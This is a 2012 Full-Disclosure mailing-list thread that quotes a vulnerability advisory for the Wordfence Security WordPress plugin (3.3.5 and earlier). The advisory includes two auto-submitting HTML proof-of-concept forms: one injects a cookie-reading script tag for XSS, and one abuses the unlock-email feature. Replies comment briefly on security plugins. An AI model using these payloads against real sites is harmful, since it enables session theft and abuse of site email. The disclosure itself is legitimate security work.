[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <CAB0fpz93oNgQp6Bm2PRX0Lnn=SS=TP6HMgSO1VxaCt-S5_GXbw@mail.gmail.com>
Date: Tue, 23 Oct 2012 16:53:42 +1100
From: Troy Rose <troyjrose@...il.com>
To: Philip Whitehouse <philip@...uk.com>
Cc: "<full-disclosure@...ts.grok.org.uk>" <full-disclosure@...ts.grok.org.uk>,
"<submissions@...ketstormsecurity.org>"
<submissions@...ketstormsecurity.org>
Subject: Re: XSS and IAA vulnerabilities in Wordfence
Security for WordPress
Its a bit like having a security alarm for an open door, IMHO.
On 20 October 2012 04:37, Philip Whitehouse <philip@...uk.com> wrote:
> Hmm,
>
> Another 'security' plugin with vulnerabilities...
>
> What exactly is the point of them? Even in an ideal world surely WP should
> be secure anyway - doesn't it just increase the attack surface?
>
> Philip Whitehouse
>
> On 19 Oct 2012, at 18:16, "MustLive" <mustlive@...security.com.ua> wrote:
>
> > Hello list!
> >
> > I want to warn you about Cross-Site Scripting and Insufficient
> > Anti-automation vulnerabilities in Wordfence Security for WordPress.
> >
> > Wordfence - it's security plugin for WordPress.
> >
> > -------------------------
> > Affected products:
> > -------------------------
> >
> > Vulnerable are Wordfence Security 3.3.5 and previous versions.
> >
> > ----------
> > Details:
> > ----------
> >
> > XSS (WASC-08):
> >
> > Wordfence Security XSS.html
> >
> > <html>
> > <head>
> > <title>Wordfence Security XSS exploit (C) 2012 MustLive.
> > http://websecurity.com.ua</title>
> > </head>
> > <body onLoad="document.hack.submit()">
> > <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
> > <input type="hidden" name="email"
> > value="<script>alert(document.cookie)</script>">
> > </form>
> > </body>
> > </html>
> >
> > Insufficient Anti-automation (WASC-21):
> >
> > Wordfence Security IAA.html
> >
> > <html>
> > <head>
> > <title>Wordfence Security IAA exploit (C) 2012 MustLive.
> > http://websecurity.com.ua</title>
> > </head>
> > <body onLoad="document.hack.submit()">
> > <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
> > <input type="hidden" name="email" value="admin@...ail.com">
> > </form>
> > </body>
> > </html>
> >
> > I've informed the plugin developer about vulnerabilities. And mentioned
> > about these vulnerabilities at my site (http://websecurity.com.ua/6106/
> ).
> >
> > Best wishes & regards,
> > MustLive
> > Administrator of Websecurity web site
> > http://websecurity.com.ua
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists